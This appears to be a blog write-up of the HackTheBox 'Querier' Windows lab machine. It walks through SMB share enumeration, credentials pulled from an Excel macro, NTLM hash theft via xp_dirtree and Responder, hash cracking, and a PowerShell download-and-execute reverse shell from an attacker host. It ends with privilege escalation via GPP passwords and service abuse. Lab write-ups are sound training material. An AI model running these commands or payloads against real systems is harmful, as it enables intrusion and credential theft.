Hello Everyone!! In this post we will see how to pwn Querier from hackthebox. 

Summary

Querier is a medium windows machine. The initial foothold requires to enumerate the smb shares to obtain the password for a user, reporting who can log in in to the mssql-server. To get the user on the system, we can steal the hash of mssql-svc user by running xp_dirtree command. Privilege escalation to the administrator is pretty straight forward as the box stores the administrator creds in the GPP .XML files.

With all that being said, let’s get started.

Initial foothold

Running a nmap scan resulted in a lot of open ports. But this time port 80 wasn’t present. So the only remaining point to start the enumeration was smb.

# nmap -sC -sV -o querier.nmap 10.10.10.125

Nmap scan report for 10.10.10.125
Host is up (0.27s latency).
Not shown: 996 closed ports
PORT STATE SERVICE   VERSION
135/tcp  open  msrpc     Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s  Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-07-05T15:44:27
|_Not valid after:  2050-07-05T15:44:27
|_ssl-date: 2020-07-05T15:45:28+00:00; +4m44s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m44s, deviation: 0s, median: 4m43s
| ms-sql-info:
|   10.10.10.125:1433:
| Version:
|   name: Microsoft SQL Server
|   number: 14.00.1000.00
|   Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
|   2.02:
|_ Message signing enabled but not required
| smb2-time:
|   date: 2020-07-05 21:15:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  5 21:10:54 2020 -- 1 IP address (1 host up) scanned in 41.58 seconds

Meanwhile I started a full port scan as well

# nmap -p-  -sV -A -T4 -vv 10.10.10.125 -o fullport.nmap

Listed all the shares with smbclient

⚡ root@kali  ~/Desktop/htb/querier> master  smbclient -L 10.10.10.125                                         
Enter WORKGROUP\root's password:

    Sharename   Type  Comment
    ---------   ----  -------
    ADMIN$      Disk  Remote Admin
    C$          Disk  Default share
    IPC$        IPC   Remote IPC
    Reports     Disk

Reports share seemed a custom one created so I listed its contents with smbmap

# smbmap -R “Reports” -H 10.10.10.125

Downloaded the xlsm file with smbmap

#smbmap -R "Reports"  -H 10.10.10.125 -A 'Currency Volume Report.xlsm'

If you are unaware of .xlsm extension, let me answer it for you.

Files with XLSM extension is a type of Spreasheet files that support Macros. XLSM files are similar to XLM file formats but are based on the Open XML format introduced in Microsoft Office 2007. A macro is used to record the steps that are performed repeatedly and facilitates performing the actions by running the macro again. All the steps performed by the users are recorded and the process is termed macro recording. Macro recording generates VBA code in the form of a macro that can be edited using the Visual Basic Editor (VBE).

There is a python package available that works with this extension. It can be installed with pip

# pip install python-oletools

Under oletools, we have olevba that is used to extract and analyze VBA Macro source code from MS Office documents.

# olevba 10.10.10.125-Reports_Currency\ Volume\ Report.xlsm

Username: Password -> reporting:PcwTWTHRwryjc$c6

In the output we can see that the olevba retrieved us the username and the password.

So now lets try to login into the mssql server.

Here the impacket script, mssqlclient.py can be used to login to the server. -windows-auth flag has to be explicitly specified as it is disabled by default.

# mssqlclient.py reporting@10.10.10.125 -windows-auth

And we are logged in!!!

Getting the user.txt

With reporting as user, we had minimal privileges. But the user can easily steal the hash of the service running. This can be done with xp_dirtree. It is a stored procedure that returns a list of every folder, every subfolder, and every file for path you give it. Here we can set the path to a fake share name that doesn’t even exist and start a responder on tun0. When the service tried to access the share, the responder will log the hash of service account.

# xp_dirtree ‘\\10.10.1415\test\’

# responder -I tun0

The hash is of the type NTLMv2. We can find the mode of the hash inside hashcat example hashes and it comes out to be 5600.

# hashcat -m 5600 hash_sql /usr/share/wordlists/rockyou.txt --force

The username is mssql-svc(can be seen in the hash) password is corporate568. After trying these creds on mssqlclient.py, I got successfully logged in. 

This time the enable_xp_cmdshell was available for the user. With this command we can execute commands on the sql-server.

We are now mssql-svc. 

Reverse shell

I used Invoke-PowerShellTcp.ps1 from nishang scripts to obtain the reverse shell. Set up the nc listener and SimpleHTTPServer on port 80.

Run the following command on the sql prompt

> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/rev.ps1\")

An we got the shell. Grab the user.txt

Privilege escalation to administrator

Upload the PowerUp.ps1 script from powersploit tools that’s used to enumerate the box.

# xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.15/PowerUp.ps1\")

# Invoke-AllChecks

In the results of PowerUp enumeration, I found two routes that could lead us to administrator.  First was abusing the usosvc service as we had the privilege to restart the service. I will show this route at the end of the blog.

In the enumeration, I also found the GPP .xml files that directly returned the password of the administrator.

Administrator:MyUnclesAreMarioAndLuigi!!1!

I used these creds on impacket’s psexec.py and got successfully logged in.

# psexec.py administrator@10.10.10.125

Box is pwned!!!

Now the alternative!

Since we could abuse the usosvc service, I tried running

# Invoke-ServiceAbuse -Name ‘UsoSvc’ -Command ‘net user administrator hacked!!’

This command will change the password of administrator to hacked!!

Again, the creds can be used with psexec.py to obtain the shell as admin.

Thats all for the blog post. Thanks for reading! For more such content subscribe to my page.

See you in the next one!! Until then, happy hunting.